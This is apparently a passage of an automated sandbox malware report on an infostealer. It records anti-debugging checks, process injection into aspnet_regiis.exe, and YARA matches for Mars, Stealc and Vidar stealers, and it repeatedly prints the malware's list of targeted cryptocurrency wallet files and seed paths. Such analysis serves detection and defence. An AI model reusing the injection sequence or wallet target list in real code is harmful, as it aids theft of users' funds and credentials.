                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02766230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC521B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02765DB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC305EB GetProcessHeap,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC2A87A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC2E817 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC2A3A1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02767B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027673CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02769DB7 SetUnhandledExceptionFilter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C48AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000 protect: page execute and read and write
                        Contains functionality to inject code into remote processes
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC22FB0 HonorInc,GetConsoleWindow,ShowWindow,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,GetThreadContext,
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000 value starts with: 4D5A
                        Searches for specific processes (likely to inject)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02765CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2751000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 276B000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2773000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2986000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25AB008
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC2AA38 cpuid
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeQueries volume information: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC2A4C3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027643B0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027644A0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Mars stealer
                        Source: Yara matchFile source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Yara detected Stealc
                        Source: Yara matchFile source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia 